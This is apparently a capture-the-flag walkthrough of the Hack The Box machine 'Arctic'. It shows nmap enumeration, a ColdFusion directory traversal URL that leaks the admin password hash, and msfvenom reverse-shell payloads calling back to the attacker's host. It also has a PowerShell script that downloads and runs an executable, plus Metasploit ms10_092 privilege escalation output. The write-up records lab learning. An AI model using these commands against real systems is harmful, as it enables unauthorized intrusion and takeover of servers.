Arctic

OS: Windows, Difficulty: Easy, IP: 10.10.10.11

Initial Enumeration

# Nmap 7.70 scan initiated Thu Jul 18 19:22:23 2019 as: nmap -sV -sC -O -A -p 135,8500,49154 -oN O-detailed 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.22s latency).

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: phone|general purpose|specialized
Running (JUST GUESSING): Microsoft Windows Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Vista SP2 (91%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   216.87 ms 10.10.14.1
2   216.90 ms 10.10.10.11

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul 18 19:24:47 2019 -- 1 IP address (1 host up) scanned in 144.76 seconds

I tried several MSRPC vulnerabilities on port 135 and 49154 but neither of them worked so I moved onto the port 8500.

-------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                |  Path
                                                                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting                                                           | exploits/cfm/webapps/36067.txt
Adobe ColdFusion - Directory Traversal                                                                        | exploits/multiple/remote/14641.py
Adobe ColdFusion - Directory Traversal (Metasploit)                                                           | exploits/multiple/remote/16985.rb
Adobe ColdFusion 2018 - Arbitrary File Upload                                                                 | exploits/multiple/webapps/45979.txt
Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting                                             | exploits/cfm/webapps/29567.txt
Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities                                            | exploits/cfm/webapps/36172.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass                                                     | exploits/windows/webapps/27755.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass (Metasploit)                                        | exploits/multiple/remote/30210.rb
Adobe ColdFusion < 11 Update 10 - XML External Entity Injection                                               | exploits/multiple/webapps/40346.py
Adobe ColdFusion APSB13-03 - Remote Multiple Vulnerabilities (Metasploit)                                     | exploits/multiple/remote/24946.rb
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting                  | exploits/cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripti | exploits/cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting        | exploits/cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting         | exploits/cfm/webapps/33168.txt
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution                   | exploits/windows/remote/43993.py
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Reading exploit 14641 got me the directory reversal exploit that reveals the password for the admin account.

http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

Ran the password hash against the Hash Killer and got the password for the admin account.

Login as admin got me access to the task scheduler which had the ability to fetch data from a website and save the output into a location on disk.

Using MSFVenom I generated a jsp exploit to be uploaded to the server and uploaded it to the CFIDE directory of the installation. (C:\ColdFusion8\wwwroot\CFIDE\reverseshell.jsp)

msfvenom -p java/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=9090 -f raw > shell.jsp

User Own

msfvenom -p java/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=9090 -f raw > shell.jsp

This got me a reverse shell as user tolis and let me capture the user flag.

C:\Users\tolis\Desktop>type user.txt
type user.txt
02650***

Root Own

My next target was to upgrade the current reverse TCP shell to a meterpreter shell. So I created another msfvenom payload and downloaded it on the target machine and got meterpreter shell.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=1337 -f exe > upgrade.exe

C:\Users\tolis\Desktop> echo $webclient = New-Object System.Net.WebClient >>wget.ps1
C:\Users\tolis\Desktop> echo $url = "http://10.10.14.10/upgrade.exe" >>wget.ps1
C:\Users\tolis\Desktop> echo $file = "upgrade.exe" >>wget.ps1
C:\Users\tolis\Desktop> echo $webclient.DownloadFile($url,$file) >>wget.ps1
C:\Users\tolis\Desktop> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

This got me a meterpreter shell as the same user (tolis) however, the shell I was running was a x86 shell and the box was a x64 machine so I had to upgrade the shell to a x64 shell.

use windows/local/payload_inject
set payload windows/x64/meterpreter/reverse_tcp

I used the longer route, it could have been done better using the migrate command builtin into meterpreter shell, but anyways, got the job done.

Computer        : ARCTIC                                                                                                                               
OS              : Windows 2008 R2 (Build 7600).                                                                                                        
Architecture    : x64                                                                                                                                  
System Language : el_GR                                                                                                                                
Domain          : HTB                                                                                                                                  
Logged On Users : 1                                                                                                                                    
Meterpreter     : x64/Windows

Now I ran local exploit suggester on the box to list all the possible attack options.

msf5 exploit(windows/local/payload_inject) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > exploit

[*] 10.10.10.11 - Collecting local exploits for x64/windows...
[*] 10.10.10.11 - 11 exploit checks are being tried...
[+] 10.10.10.11 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_092_schelevator
msf5 exploit(windows/local/ms10_092_schelevator) > run                                                                                                 
                                                                                                                                                       
[*] Started reverse TCP handler on 10.10.14.7:4444                                                                                                     
[*] Preparing payload at C:\Users\tolis\AppData\Local\Temp\rrsLwdjbWyAg.exe                                                                            
[*] Creating task: j3g1a23bsAo                                                                                                                         
[*] SUCCESS: The scheduled task "j3g1a23bsAo" has successfully been created.                                                                           
[*] SCHELEVATOR                                                                                                                                        
[*] Reading the task file contents from C:\Windows\system32\tasks\j3g1a23bsAo...                                                                       
[*] Original CRC32: 0x874dd23e                                                                                                                         
[*] Final CRC32: 0x874dd23e                                                                                                                            
[*] Writing our modified content back...                                                                                                               
[*] Validating task: j3g1a23bsAo                                                                                                                       
[*]                                                                                                                                                    
[*] Folder: \                                                                                                                                          
[*] TaskName                                 Next Run Time          Status                                                                             
[*] ======================================== ====================== ===============                                                                    
[*] j3g1a23bsAo                              1/8/2019 2:39:00     Ready                                                                                
[*] SCHELEVATOR                                                                                                                                        
[*] Disabling the task...                                                                                                                              
[*] SUCCESS: The parameters of scheduled task "j3g1a23bsAo" have been changed.                                                                         
[*] SCHELEVATOR                                                                                                                                        
[*] Enabling the task...                                                                                                                               
[*] SUCCESS: The parameters of scheduled task "j3g1a23bsAo" have been changed.
[*] SCHELEVATOR
[*] Executing the task...
[*] Sending stage (179779 bytes) to 10.10.10.11
[*] SUCCESS: Attempted to run the scheduled task "j3g1a23bsAo".
[*] SCHELEVATOR
[*] Deleting the task...
[*] Meterpreter session 4 opened (10.10.14.7:4444 -> 10.10.10.11:49702) at 2019-07-18 21:18:43 +0530

[*] SUCCESS: The scheduled task "j3g1a23bsAo" was successfully deleted.
[*] SCHELEVATOR
meterpreter > sysinfo
Computer        : ARCTIC
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > shell
Process 3216 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Users\Administrator\Desktop>type root.txt
ce65c***

Learning Outcome

I have to stop being so dependent upon metasploit for my post exploitation. Learned a way to download files using CMD line, and how to upgrade shell to x64.

PreviousOptimum NextBounty

Last updated 6 years ago

Was this helpful?